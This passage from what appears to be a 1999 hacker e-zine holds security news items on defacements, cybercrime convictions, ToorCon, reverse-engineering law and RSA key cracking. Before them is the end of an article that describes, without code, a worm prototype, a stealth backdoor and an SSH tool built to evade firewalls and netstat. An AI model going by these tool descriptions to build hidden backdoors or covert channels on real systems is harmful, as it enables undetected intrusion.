     cl (Chile)                                ee (Estonia)
     is (Iceland)                              th (Thailand)
     su (Soviet Union)                         sk (Slovakia, Slovak Republic)
     ae (United Arab Emirates)                 si (Slovenia)
     cn (China)                                ro (Romania)
     co (Colombia)                             ua (Ukraine)
     id (Indonesia)                            uy (Uruguay)
     in (India)                                lv (Latvia)
     lt (Lithuania)                            ph (Philippines)
     ve (Venezuela)                            bg (Bulgaria)
     hr (Croatia 'Hrvatska')                   yu (Yugoslavia)
     lu (Luxembourg)                           kw (Kuwait)
     do (Dominican Republic)                   pe (Peru)
     cy (Cyprus)                               nu (Niue)
     cr (Costa Rica)                           pk (Pakistan)
     na (Namibia)                              lb (Lebanon)
     tt (Trinidad And Tobago)                  eg (Egypt)
     kg (Kyrgyzstan)                           to (Tonga)
     gl (Greenland)                            pr (Puerto Rico)
     ec (Ecuador)                              kz (Kazakhstan)
     bm (Bermuda)                              bn (Brunei Darussalam)
     py (Paraguay)                             zw (Zimbabwe)
     mt (Malta)                                gt (Guatemala)
     sv (El Salvador)                          cc (Cocos 'Keeling' Islands)
     cx (Christmas Island)                     pa (Panama)
     by (Belarus)                              ni (Nicaragua)
     ge (Georgia)                              ke (Kenya)
     om (Oman)                                 bw (Botswana)
     bo (Bolivia)                              fo (Faroe Islands)
     bh (Bahrain)                              mu (Mauritius)
     ma (Morocco)                              lk (Sri Lanka)
     ad (Andorra)                              mk (Macedonia, Former Yugoslav)
     md (Moldova, Republic)                    bs (Bahamas)
     vi (Virgin Islands, US)                   ng (Nigeria)
     am (Armenia)                              ba (Bosnia And Herzegowina)
     jo (Jordan)                               ky (Cayman Islands)
     li (Liechtenstein)                        jm (Jamaica)
     sa (Saudi Arabia)                         gi (Gibraltar)
     zm (Zambia)                               pf (French Polynesia)
     sz (Swaziland)                            tm (Turkmenistan)
     bz (Belize)                               mc (Monaco)
     ir (Iran, Islamic Republic)               ci (Cote D'Ivoire)
     uz (Uzbekistan)                           sm (San Marino)
     ai (Anguilla)                             fj (Fiji)
     sn (Senegal)                              gh (Ghana)
     bf (Burkina Faso)                         ag (Antigua And Barbuda)
     fm (Micronesia, Federated States)         az (Azerbaijan)
     gp (Guadeloupe)                           np (Nepal)
     dm (Dominica)                             mo (Macau)
     mz (Mozambique)                           tz (Tanzania, United Republic)
     pg (Papua New Guinea)                     st (Sao Tome And Principe)
     ug (Uganda)                               nc (New Caledonia)
     gf (French Guiana)                        tg (Togo)
     mv (Maldives)                             gu (Guam)
     al (Albania)                              hn (Honduras)
     im (Isle of Man)                          aw (Aruba)
     cu (Cuba)                                 vu (Vanuatu)
     tc (Turks And Caicos Islands)             et (Ethiopia)
     tj (Tajikistan)                           hm (Heard And Mc Donald Islands)
     gy (Guyana)                               tn (Tunisia)
     mg (Madagascar)                           kh (Cambodia)
     ac (Ascension Island)                     as (American Samoa)
     nf (Norfolk Island)                       aq (Antarctica)
     io (British Indian Ocean Territory)       ck (Cook Islands)
     bb (Barbados)                             gb (United Kingdom)
     je (Jersey)                               mq (Martinique)
     sh (St. Helena)                           bt (Bhutan)
     vn (Viet Nam)                             ms (Montserrat)
     lc (Saint Lucia)                          dz (Algeria)
     vg (Virgin Islands, British)              ye (Yemen)
     sb (Solomon Islands)                      mn (Mongolia)
     ls (Lesotho)                              gg (Guernsey)
     ne (Niger)                                mr (Mauritania)
     mp (Northern Mariana Islands)             gw (Guinea-Bissau)
     sl (Sierra Leone)                         qa (Qatar)
     tf (French Southern Territories)          bj (Benin)
     va (Vatican City State)                   cd (Congo, Democratic Republic)
     an (Netherlands Antilles)                 km (Comoros)
     sc (Seychelles)                           gs (South Sandwich Islands)
     kn (Saint Kitts And Nevis)                ly (Libyan Arab Jamahiriya)
     pn (Pitcairn)                             gd (Grenada)
     cm (Cameroon)                             tp (East Timor)
     mh (Marshall Islands)                     ws (Samoa)
     um (United States Minor Outlying Islands) tv (Tuvalu)
     sy (Syrian Arab Republic)                 re (Reunion)
     pw (Palau)                                mw (Malawi)
     mm (Myanmar)                              ml (Mali)
     lr (Liberia)                              cv (Cape Verde)
     cg (Congo, Republic)                      af (Afghanistan)
    
     [item 4] Lukemia 
    
     One of our first research projects (circa 1997) involved researching possible designs of a modern network worm. We even developed a
     prototype in C which implements some of our ideas. 
    
     Today, we're pretty horrified by our choice of language (In C, everything is equally difficult, "help save the world!" -- use Perl) and the
     quality of the code (butt ugly). 
    
     [item 5] Portacelo 
    
      "Local security subversion. Why human and (current) software (tripwire and others) host-based Intrusion Detection Systems are a bad
      idea." 
    
     We did some research (right after the IAP was over) in this subject, and plan to release an article sometime in the near future. 
    
     A fully-featured backdoor implementation is available, demonstrating the concept, which combines SSH ESP (suffix item 6), a kernel
     module, direct memory manipulation, and a good old fashioned binary trojan. 
    
     [item 6] SSH ESP 
    
     A hacked SSH suite modified to implement ESP (Encapsulated encrypted STREAMS Protocol) at the application level. 
    
     Notable features include: 
    
          piercing almost any current filter firewall. (ab-uses any available packet traffic: tcp, udp and icmp) 
          invisible at the operating system level. (netstat and friends will not register any activity) 
          practical. (ESP is almost as fast and reliable as TCP, including error correction) 
          military strength encryption. (thanks to SSH) 
    
     [item 7] Note to the reader 
    
     Christ, it took me, Liraz, over 2 weeks to write this silly article, during which I had to drop whatever I was doing, and devote the bulk of my
     time to writing this memorandum of the IAP in English, which is not my native language. 
    
     (Disclaimer: Please excuse any errors in syntax, grammar or spelling. That felt good. Please forgive my bad writing, untasteful dramatics,
     poor sense of humor... I'll stop now...) 
    
     In the process I had to convince my fellow project associates (some of them very strong willed) that documenting the IAP was A Good
     Thing, at least for posterity's sake... 
    
     And all so I could offer you, dear reader, a chance to share some of my humble insights on computer security, and a taste of hacker
     culture. This is my first publication, I'm not too sure on how this is going to be accepted. Frankly, I prefer writing code, so I'm not sure I'll
     be writing any more articles soon. Whether or not that happens depends on the response I get from interested readers. 
    
     If there is a good response, there will be more. But goddammit, they'll be shorter this time! 
    
     I hope the article wasn't too technical for your tastes, but the project was mostly about overcoming technical and logistical difficulties, so
     that was hard to escape. 
    
     Also, I am very short on time and resources, so if anyone is interested in sponsoring the material (an official SSR website for the rant and
     the software), that would be great. 
    
     Oh, any takers on the IDDN front? We can start out with a (preferably archived) mailing list, find some interested people, get the ball
     rolling... 
    
     All points of contact: liraz@bigfoot.com 
    
     @HWA
     
32.0 TCS Web Page Defacer Pleads Guilty 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/      

      contributed by Dioxin 
      A 15-year old has pleaded guilty to defacing the web
      page of two Television Corporation of Singapore (TCS)
      web sites. The defacement occurred back in June. The
      infocriminal will be sentenced soon for four counts of
      unauthorized entry and the disclosure of passwords.
      The individual made several guesses at the login/password
      and eventually hit upon a combination that worked,
      "news/news". (And no sanctions against TCS for having
      weak/no security) 

      The Straits Times
      http://straitstimes.asia1.com.sg/cyb/cyb1_0813.html
      HNN Archive for June 18
      http://www.hackernews.com/arch.html?061899#4
      
      (Straits Times article provided a 404)
      
      @HWA
      
33.0 Cybercrime On the Rise in Russia - First Offender Convicted 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/      
 
      contributed by Lionel 
      The Russian Home Office has detected more than 100 IT
      related offenses since the beginning of the year. Russia
      has convicted its first computer related offender: an 18
      year old student who stole $11,000 from a US company
      by selling its products over the Internet has been
      sentenced to 5 months in jail. 

      S Yahoo - French      
      http://www.yahoo.fr/actualite/19990812/multimedia/934457760-yaho140.120899.133648.html
      
      Thursday 12 August 1999, 13:36

      Nearly 100 computer crimes detected in Russia in 7 months
      
      MOSCOW, 12 August (AFP) - The Russian Interior Ministry has detected nearly 100 cases of computer
      fraud since the beginning of the year, the Itar-Tass agency reported on Thursday.
      
      "Russia had to start solving this problem after break-ins into computer systems abroad
      carried out from Russia," commented Vladislav Selivanov, head of the department for combating
      computer fraud, which was created a year ago. 
      
      Computer fraud in all its forms has increased recently in Russia because of the economic
      crisis, according to Sergueï Grouzdev, director of the company Aladdin, which produces protection
      systems for software.
      
      "The losses we have discovered recently amount to several hundred dollars per day, but the
      real figures are far higher," he estimated.
      
      The first conviction of a computer hacker in Russia took place in November in Moscow: an
      18-year-old Russian student who had swindled 11,000 dollars from an American company selling its
      products on the internet was given a 5-year suspended prison sentence.
      
      neo/fd t
      
      @HWA
      
      
34.0 ToorCon Less Than One Month Away 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/      
     
      contributed by skalore 
      The first annual ToorCon is set to take place in less
      than one month, on September 3rd-4th, at the Price
      Center in The University of California, San Diego.
      ToorCon is San Diego's only comprehensive computer
      security conference, and will feature lectures that range
      from topics such as IDS, Stack-based buffer overflows,
      secure remote communications, and more. ToorCon will
      also feature staff members from Attrition.org and
      reporters from the San Diego Union Tribune.
      And of course, after the day's lectures, San Diego's
      friendly neighbor to the south, Mexico, is available 24
      hours, for partying and fun. 

      HNN Cons page      
      http://www.hackernews.com/cons/cons.html
      
      @HWA
      
35.0 FRESHMEAT.NET BOUGHT
     ~~~~~~~~~~~~~~~~~~~~ 
     
     From http://www.net-security.org/
     
     by BHZ, Saturday 14th August 1999 on 9:51 pm CET
     It looks like Linux related sites are interesting for acquisition. After buying the Slashdot
     web site (www.slashdot.org), Andover.net bought the well known FreshMeat
     (www.freshmeat.net). Plans for this site are the same as for Slashdot - Andover.net
     will earn money from selling advertising space.       
     
     @HWA
     
36.0 LINUXPPC CRACK-CONTEST FINISHED
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

     From http://www.net-security.org/
     
     by Thejian, Saturday 14th August 1999 on 8:20 pm CET
     The LinuxPPC crack-the-box contest has come to an early end. No-one has made a
     successful attempt yet, but the organization of the contest decided to stop it
     for the following reasons: "Although it is interesting to have all of you try to break into
     the machine here, there are some problems that we found with that method. 1) Waste
     of bandwidth, 2) Waste of useful machine that is supposed to go to AbiSource, 3)
     People are not following the rules anymore: Instead of breaking into our machine,
     they have started to piss off the ISP and other customers because they are trying to
     break into other machines. Please note: This is an illegal activity and out of our
     hands. If you are doing this and continue to, the normal process of prosecuting such
     action will occur. 4) Because so many people are trying, interesting attacks are
     difficult to perform."      
     
     @HWA
     
37.0 INFOSEEK HACKED
     ~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/
     
     by BHZ, Saturday 14th August 1999 on 5:52 pm CET
     Today Infoseek (infoseek.go.com) was hacked. As Attrition collects defaced mirrors
     for archiving they noticed on this hack: "infoseek.go.com received an interesting hack
     of sorts. Attempting to search for anything would potentially yield a defaced page.
     The person reporting the hack to the Attrition staff received it after 5 searches. We
     tested it and received the defaced page on the first search attempt. This page stands
     out in comparison with their normal pages". Mirror of the defacement 
     here: http://www.attrition.org/mirror/attrition/com/infoseek.go.com/Titles.html
     
     @HWA
     
38.0 HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/
      
     by Thejian, Saturday 14th August 1999 on 6:00 am CET
     FreeS/Wan is an open-source software package for Linux based servers that uses
     strong encryption to create secure data tunnels between any two points on the
     internet. It uses the IPsec protocol, an interoperable global standard for securing IP
     connections. The software generated strong interest among the 1,800 hackers who
     attended the Chaos Communication Camp, the Chaos Computer Club's first
     international hacker conference held outside Berlin last weekend. Here are some
     opinions on it.      
     
     @HWA
     
39.0 TRINUX 0.62 RELEASED
     ~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/
      
     by Thejian, Saturday 14th August 1999 on 5:40 am CET
     Trinux is a portable Linux distribution that boots from 2-3 floppies (or a FAT 16
     partition) and runs entirely in RAM. Trinux contains the latest versions of popular
     network security tools and is useful for mapping and monitoring TCP/IP networks.
     Trinux transforms an ordinary x86 PC into a powerful network (security) management
     workstation without modifying the underlying hardware or operating system. Get it
     here: http://www.trinux.org
     
     @HWA
     
40.0 GOVERNMENT FACES SECURITY SKILLS SHORTAGE
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/
      
     by Thejian, Saturday 14th August 1999 on 5:20 am CET
     The US federal government is facing a tremendous shortage of people needed to fight
     future cyberwars. Over the next seven years, the government will have to replace
     more than 32,000 information technology workers -- almost half of the 71,000 IT
     workers employed by federal agencies, according to a recent study by the federal
     Chief Information Officers Council. Of most concern is the need for IT employees with
     information security skills, according to a recent federal report urging the creation of a
     massive intrusion-detection system to protect federal and critical private systems,
     such as energy, telecommunications and transportation, against cyberattack.
     Computerworld.      
     
     (Online News, 08/12/99 05:34 PM)



       Government faces security skills
                       shortage
                      By Patrick Thibodeau


     WASHINGTON -- Federal officials are looking at ways to
     prevent an "electronic Pearl Harbor" -- a sneak cyberattack.
     But in a situation somewhat parallel to the plight of the
     undermanned and unprepared military in 1941, the federal
     government is facing a tremendous shortage of people
     needed to fight any future cyberwar. 

     Over the next seven years, the government will have to
     replace more than 32,000 information technology workers --
     almost half of the 71,000 IT workers employed by federal
     agencies, according to a recent study by the federal Chief
     Information Officers Council. Much of the turnover is the
     result of a rise in the number of employees eligible for
     retirement. 

     Of most concern is the need for IT employees with
     information security skills, according to a recent federal
     report urging the creation of a massive intrusion-detection
     system to protect federal and critical private systems, such
     as energy, telecommunications and transportation, against
     cyberattack. 

     The national cyber protection plan recommends funding
     information security programs at universities and offering
     scholarships to students in exchange for a commitment to
     work at federal agencies. Such programs may ultimately
     benefit private companies. 

     Only a handful of universities now offer programs in
     information security. "Security hasn't made it into the
     mainstream of academe," said Lance J. Hoffman, a
     professor of computer science at George Washington
     University in Washington. 

     So most IT students study to become programmers or
     Windows NT experts, while security specialists tend to get
     their training on the job, said Paul Jansen, manager of
     information security at loan guarantor and administration
     company USA Group Inc. in Indianapolis. When he hires,
     "I'm hiring other companies' security people," he said. 

     If more universities offer security training, "I'm going to get
     people who have a better understanding of what our
     profession is all about," Jansen said. 

     Throughout the industry, companies are having a tough time
     hiring IT workers with security skills. "I consider the need
     dire," said Richard Power, editorial director at the Computer
     Security Institute in San Francisco. 

     Salary issues, in particular, make it hard for federal
     agencies to compete with the private sector. Government IT
     workers often start at salaries of less than $25,000, and the
     federal security plan recommends improving pay. 

     There is "fierce competition" for IT workers with security
     skills, said Timothy Grance, manager of systems and
     network security at the National Institute of Standards and
     Technology. But a pay-for-performance salary program and
     the promise of working on research projects have been
     hiring incentives, he said. 
     
     @HWA

     
41.0 SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/
     
     by Thejian, Saturday 14th August 1999 on 5:00 am CET
     Passage of the Copyright Amendment (Computer Programs) Bill 1999, legislation
     passed yesterday, will allow software engineers to decompile computer software in
     limited circumstances to develop interoperable products. Read more below. 
      
     
     Consumers and computer industry benefit from copyright changes 

      Senator the Hon Richard Alston
      Minister for Communications, the Information
      Economy and the Arts
                                                                        The Hon Daryl Williams AM QC
                                                                                     Attorney-General


     JOINT NEWS RELEASE 

     13 August 1999 

     Consumers will have greater choice in computer software and Australian-developed software will be more internationally
     competitive as a result of new legislation passed yesterday. 

     The Attorney-General, the Hon Daryl Williams AM QC MP and Senator the Hon Richard Alston, Minister for Communications,
     Information Technology and the Arts announced today that passage of the Copyright Amendment (Computer Programs) Bill 1999
     will allow software engineers to decompile computer software in limited circumstances so they can develop interoperable
     products. 

     Currently software copyright owners can block this type of decompilation as an infringement of copyright. 

     New laws mean developers will be able to decompile software to find this vital interface information if it is not readily available. 

     Overseas developers have been able to do this for some time, particularly in Europe and the United States of America where
     Australia's main competitors in this sector are located. 

     The amendments to the Copyright Act confirm that the Australian Government is committed to creating an environment that is
     conducive to increasing the competitiveness of Australian business and providing choice for consumers. 

     The legislation also recognises that Australia's information industries underpin competitiveness of other industry sectors,
     particularly in the global economy. 

     The legislation also makes changes to the Copyright Act important for the development of the information economy in Australia. 

     The information age brings with it new threats to our safety and security - such as computer viruses and increasing incidence of
     unauthorised access to valuable information stored digitally. 

     The legislation will help companies protect their valuable digital assets by providing another tool with which to deal with these
     threats. 

     In recognition of the importance of resolving the year 2000 computer date (Y2K) problem, the legislation will operate
     retrospectively for error correction to the date of the announcement of the Government's decision, 23 February 1999. 

     Decompilation of a program will be allowed without the copyright owner's permission for interoperability or security testing only if
     the information on the program's interfaces or on ensuring system security is not readily available. 

     Information derived from decompilation of a program about its interfaces with other software or about errors in a defective copy,
     including Y2K problems, or which is required for testing system security cannot be used or communicated to others for any other
     purpose, without the copyright owner's permission. 

     The severe penalties for copyright piracy will continue to apply. These penalties comprise up to $60,500 and / or five years in
     prison for each offence by an individual and up to $302,500 for each offence by a corporation. 

     Media Contacts: 

     Nicholas Harford
     Mr Williams' office (02) 6277 7300 

     Terry O'Connor
     Senator Alston's office (02) 6277 7480 
       
     @HWA
     
42.0 IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/

     by Thejian, Saturday 14th August 1999 on 4:50 am CET
     In a bid to bolster e-commerce security, the Irish government has introduced
     legislation that would criminalize the fraudulent use of e-signatures, subjecting
     violators to possible imprisonment and fines in excess of US$100,000. Under the
     extensive proposed legislation, e-signature documents and contracts will be afforded
     the same legal status as their paper counterparts. Info on 32bitsOnline. 
     
     http://www.32bitsonline.com/news.php3?news=news/199908/nb199908135&page=1
     
     
     Ireland Intends To Criminalize E-Signature Fraud 

     By: David McGuire
     Date: 08/13/99
     Location: WASHINGTON, DC, U.S.A.

     In a bid to bolster e-commerce security, the Irish government has introduced legislation that would criminalize
     the fraudulent use of e-signatures, subjecting violators to possible imprisonment and fines in excess of
     US$100,000. 

     "The (European Union) is expected to come out with an e-signature directive and we've beat them (to it) with
     our own," Ken Thompson, spokesperson for the Irish embassy in Washington, DC, told Newsbytes today. 

     Under the extensive proposed legislation, "e-signature documents and contracts will be afforded the same
     legal status as their paper counterparts," Thompson said. 

     The ultimate goal of the legislation, which is expected to be passed into law before Christmas, is to heighten
     e-commerce security using the "lightest regulatory touch" possible, Thompson said. 

     The legislation was proposed by Ireland's Department of Public Enterprise and should encounter no significant
     obstacles in becoming law, Thompson said. 

     Under Irish parliamentary structure, bills that enjoy the support of the majority party are essentially assured of
     passage. 

     Full text of the proposed legislation is located online at http://www.ecommercegov.ie/ . 

     Earlier this month, the US House of Representatives' Committee on Commerce approved by unanimous voice
     vote the Electronic Signatures in Global and National (E-SIGN) Commerce Act, H.R. 1714. 

     H.R. 1714 would legalize the use of digital signatures, making them as legally binding as a hand-signed John
     Hancock. The bill also establishes federal rules for digital signatures, replacing a patchwork of different state
     regulations. 
                          
     @HWA 
    
43.0 ISRAEL AND PIRACY
     ~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 

     by Thejian, Saturday 14th August 1999 on 4:00 am CET
     The whole of Israel shares the same disk, goes the joke. But Israel's almost getting
     placed on the Office of the United States Trade Representative's infamous Priority
     Foreign Country List for its alleged illegal activities is no laughing matter. According
     to the annual global report jointly prepared by the Software and Information Industries
     Association (SIIA) and the Business Software Alliance (BSA), 48 percent of software
     used in 1998 in Israel was illegal and this has to change. Wired.      
     
     Piracy Rampant in Israel
     by Tania Hershman
     
     3:00 a.m.  13.Aug.99.PDT
     JERUSALEM -- When is a Microsoft Intellimouse not a Microsoft Intellimouse? When it's one of the several thousands of fake mice recently seized by
     police from an Israeli warehouse. 
     
     The whole of Israel -- government included -- is sharing one disk, goes the joke. But for manufacturers big and small, Israelis' predilection for
     piracy, of software and music as well as hardware, is no laughing matter. 
     
     Israel is dangerously close to being placed on the Office of the United States Trade Representative's infamous Priority Foreign Country List for its
     alleged illegal activities. 
     
     New Justice Minister Yossi Beilin, visiting the United States this week, announced that he will be trying to appease the powers-that-be in order to
     avoid the next step -- sanctions. 
     
     According to the annual global report jointly prepared by the Software and Information Industries Association (SIIA) and the Business Software
     Alliance (BSA), 48 percent of software used in 1998 in Israel was illegal, which represents lost revenues of US$63 million. 
     
     While Israel does not top the list -- in Russia, for example, the figure is closer to 90 percent -- the United States is particularly upset with Israel
     because the government appears to be doing nothing. 
     
     There may be a reason for this. "The government is one of the biggest of the software industry's customers, and they are using illegal software,"
     says Ami Fleischer, Israel's representative to the BSA. 
     
     "But when we say illegal software, this doesn't mean that there is a government official going down to the flea market," he added. 
     
     The situation is euphemistically called 'under-licensing' or 'overworking,' meaning the number of licenses falls below the number of copies being used.
     
     On a wider scale, the Israeli public is not averse to "borrowing" software, believing that the chances of being caught are slim to none. "Bill Gates
     can afford it, right?" laughed one offender. 
     
     Microsoft is not the only target: Other, smaller software houses with all their hopes riding on one product are being hit much harder. 
     
     This culture of acceptable piracy may be rooted in the bootleg Hebrew music trade. At the central bus station in Tel Aviv, illegal cassettes and CDs
     of Israel's top artists are hawked openly. 
     
     The damage done to this small local industry has been sufficient to warrant a national ad campaign featuring gagged Israeli singers. 
     
     Israeli piracy is not limited to Israel's borders. Illegal copies are making their way abroad, too. "The figure of 48 percent doesn't show the whole
     picture. That doesn't get into the export issue. Forty-eight percent is a low estimate," said Keith Kupferschmidt, the SIIA's intellectual property
     counsel in Washington. 
     
     Kupferschmidt has a word of advice for new prime minister Ehud Barak. "Whenever there is a high piracy rate there is a problem with people's
     understanding of what it is acceptable to do," he said. "If you have people in government whose job it is to crack down on piracy and the
     government devotes resources, we would see a different attitude." 
     
     New legislation is in the works to modernize a copyright law dating back to 1911. According to Sandra Azancot, legal advisor on intellectual
     property law at Israel's Ministry of Justice, "The new legislation is a much more modern law, with a lot of clarification and strengthening." 
     
     For example, the punishment for criminal offenses will now be five years instead of three. 
     
     During his US visit this week, Justice Minister Beilin is talking up this legislation, as well as the new antipiracy police unit set up a few months ago.
     He will also be pointing to the fact that only three years ago 75 percent of software in Israel was illegal, over 50% higher than today. 
     
     Yes, big organizations have smartened up their act, said the BSA's Ami Fleischer, but among small businesses with smaller pockets -- half of the
     Israeli business sector -- piracy is at the 80 percent mark. "People must understand that paying for software is part of the financial costs [of the
     company]," he stresses. 
     
     With its thousands of high-tech start-ups Israel likes to think of itself as another Silicon Valley. But this won't last long if it allows potential
     technological and business allies to be ripped off. 
     
     The Office of the US Trade Representative, which normally surveys the situation every April, is holding an extraordinary review in December of the
     Israeli government's progress. If it is not impressed, Israel will have six months to comply with certain conditions, says Fleischer, "and then the
     federal government will be obliged to impose sanctions." 
    
     @HWA
     
     
44.0 OUTSIDE HELP ISN'T WANTED 
     ~~~~~~~~~~~~~~~~~~~~~~~~~ 

     From http://www.net-security.org/ 

     by BHZ, Saturday 12th August 1999 on 3:58 pm CET
     Retired Cobol programmers will not be needed to help in building Y2K prepared
     systems. The vice president of communications at the Information Technology
     Association of America said: "We've seen many companies do much more work on
     this issue with internal staff than [was] originally thought earlier on". If you are
     wondering why Cobol programmers are important to solving the Y2K bug, go here. 
     http://default.net-security.org/1/03.htm
     
     @HWA
     
45.0 HACKER MYTHOLOGY
     ~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
      
     by BHZ, Saturday 12th August 1999 on 3:51 pm CET
     ZDNet did a piece from this year's WebSec security conference. "The image of the
     hacker as a romantic, dangerous figure is pervasive, even in high-tech industries.
     Vendors promote such an image to sell security products. Hackers and wannabes
     promote it for the mystique". 
     
     (Article not found - Ed)
     
     @HWA
     
46.0 DEFAULT ISSUE #1
     ~~~~~~~~~~~~~~~~ 
     
     From http://www.net-security.org/ 
 
     by BHZ, Friday 13th August 1999 on 7:01 pm CET
     We are proud to announce that Default - Help Net Security newsletter is available to
     our readers. First issue covers: Last week's news on Help Net Security, Y2K: As the
     millennium approaches, A look into basic cryptography, The history of Zero
     Knowledge Systems, Telecommunications 101, Macintosh security: How to make
     your mac a babel tower, Computing: A closer look at hard- and software, An
     approach to Linux System Security, Infection & Vaccination, Spam: The problems
     with junk e-mail, Freedom of speech - related incidents, Meet the underground and a
     Guest column. So go to Default web-site (http://default.net-security.org) and start
     reading :)      
     
     @HWA
         
47.0 MICROSOFT AND AOL
     ~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
      
     by BHZ, Friday 13th August 1999 on 6:57 pm CET
     A Microsoft employee impersonated a private technology consultant and sent an e-mail
     accusing AOL of irresponsible behavior in the battle over instant messaging. Microsoft
     officials haven't commented on it yet, but Richard Smith, a security expert who received
     this e-mail, said that Microsoft confirmed that the e-mail came from their employee.
     Contributed by ZaP. 
     
     @HWA
     
48.0 INTERVIEW WITH ERIC RAYMOND
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
         
     by BHZ, Friday 13th August 1999 on 6:45 pm CET
     ZDNet has published an interview with Eric Raymond, a programmer who supports
     the open source movement which gave birth to the Linux operating system. He describes
     himself as "an anthropologist of the loosely knit community of developers who, on
     their own, have tinkered away at the increasingly popular alternative OS". Read the
     interview with Raymond (url not found)

     @HWA 
     
49.0 CODE-CRACKING COMPUTER CAUSES CONCERN
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From http://www.net-security.org/ 
     
     by Thejian, Friday 13th August 1999 on 2:00 am CET
     Adi Shamir, one of the developers of the RSA encryption method, says he has
     designed a computer that could crack open a file encoded using RSA in only a few
     days. Needless to say, with RSA being one of the most widely used encryption
     methods, such a computer could jeopardize the privacy of the bulk of electronic
     commerce as practiced today. Full story.          
     
     Code-cracking computer causes concern
  
     WORCESTER, Mass. (AP) -- A developer of one of the most widespread
     computer encryption systems said Thursday he has designed a computer
     that could crack open a file encoded using the most common form of data
     encryption in only a few days. 
  
     If built -- at an estimated cost of about $2 million -- such a computer could
     jeopardize the privacy of the bulk of electronic commerce as practiced
     today, according to cryptographers at the conference where the design was
     shown. 
  
     Most highly sensitive military, banking and other data are protected by
     stronger encryption keys beyond its reach. The commonly used weaker
     keys, though, would become "easy to break for large organizations," said
     cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot,
     Israel. 
  
     He both developed the new computer design and helped invent the
     widespread coding system -- known as RSA public-key encryption -- that it
     cracks. 
  
     Shamir spoke at the opening of a two-day conference of more than 120
     cryptography experts from around the world at Worcester Polytechnic
     Institute. 
  
     Computer scientists said his work underscores the growing vulnerability of
     the most commonly used short form of RSA keys, which consists of just 512
     bits. The key -- a sequence of 1s and 0s, or bits -- unlocks the secret coding
     of a computer transmission so it can be deciphered. 
  
     Shamir dubs his idea for the computer Twinkle, which stands for The
     Weizmann Institute Key Locating Engine, and also refers to the twinkle of
     its light-emitting diodes. The 6-by-6-inch optical computer would measure
     the light from diodes to perform mathematical calculations solving 512-bit
     RSA encryption keys faster than ever -- within two or three days. An effort
     in February to solve shorter, easier 465-bit keys took hundreds of computers
     and several months. 
  
     Shamir first informally showed a prototype of his device at a conference in
     Prague, the Czech Republic, in May. He publicly outlined its workings at
     length for the first time Thursday. 
  
     "Twinkle is a little out there, but it looks like it's buildable to me," said Seth
     Goldstein, an expert in computer architecture at Pittsburgh's Carnegie
     Mellon University. 
  
     Organized crime, friendly and unfriendly governments, research institutions
     and others might take an interest in such a project, conference participants
     suggested. 
  
     In any event, users of 512-bit keys "should be worried," said Christof Paar,
     a computer engineer at Worcester Polytechnic Institute. 
  
     "In the current state of the art, it is not secure," added Bob Silverman, a
     research scientist at Bedford, Mass.-based RSA Laboratories, a division of
     RSA Data Security, which Shamir co-founded but where he no longer
     works. 
  
     Longer keys, such as 1,024-bit, are already employed for many sensitive
     communications. But, out of intelligence and other concerns, the U.S.
     government requires special permission to export software with the longer
     keys. The most popular browsers are normally set to just 512 bits. 
  
     Brian Snow, a technical director for information security at the National
     Security Agency, spoke to the conference Thursday about weak quality
     assurance in commercial security products, but declined to answer press
     questions. 
  
     Longer keys are harder to set up and take more computer power to operate.
     Such power may be scarce in the wireless telephones, home appliances and
     other computerized conveniences of the future, cryptographers said.
     
     @HWA

                 
50.0 HACKING YOUR WAY TO AN IT CAREER
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.net-security.org/ 
     
     by Thejian, Friday 13th August 1999 on 1:30 am CET
     It's no secret that talented hackers often eventually end up in IT-related jobs. David
     Del Torto, director of technology for security services at Deloitte & Touche in San
     Francisco, presented hacker career workshops at the Chaos Computer Camp last
     weekend. Here are some of his tips. Interesting note: according to Del Torto,
     talented programmers are preceded by their reputation in the small IT security
     community, and he won't hire or recommend people who don't act responsibly. It's
     all about the ethics eh? So what would you do?
     
     (Online News, 08/12/99 05:34 PM)



       Hacking your way to an IT career
                        By Ann Harrison


     ALTLANDSBERG, GERMANY -- At the first annual Chaos
     Communication Camp, which took place outside of Berlin
     last weekend, hundreds of hackers and their
     machines filled the main hack tent exchanging information
     on the latest exploits and security tools. Most were young,
     skillful and in demand by corporate information technology
     departments. 

     The camp, which attracted some of the most talented
     European and American hackers, was one of the largest
     hacker gatherings in Europe so far this year. 

     David Del Torto, director of technology for security services
     at Deloitte & Touche in San Francisco, agreed. He noted
     that hackers like himself were working at all the top five
     auditing and accounting firms. 

     Del Torto presented hacker career workshops with titles
     such as "Take This Job and Ping It/Hacking The Corporate
     Ladder For Fun & Profit." 

     The following are some of the tips he offered hackers
     seeking corporate jobs: 

       -  Write your own job description. 

       -  Volunteer for a project in your area of expertise. 

       -  Network with people. 

       -  Start your own company. 

       -  Or sign on to another start-up.

     He also advised the crowd to build tools they themselves
     would use ("You should be customer No. 1!"), license
     technology when appropriate and solve problems with free
     software or generate it. 

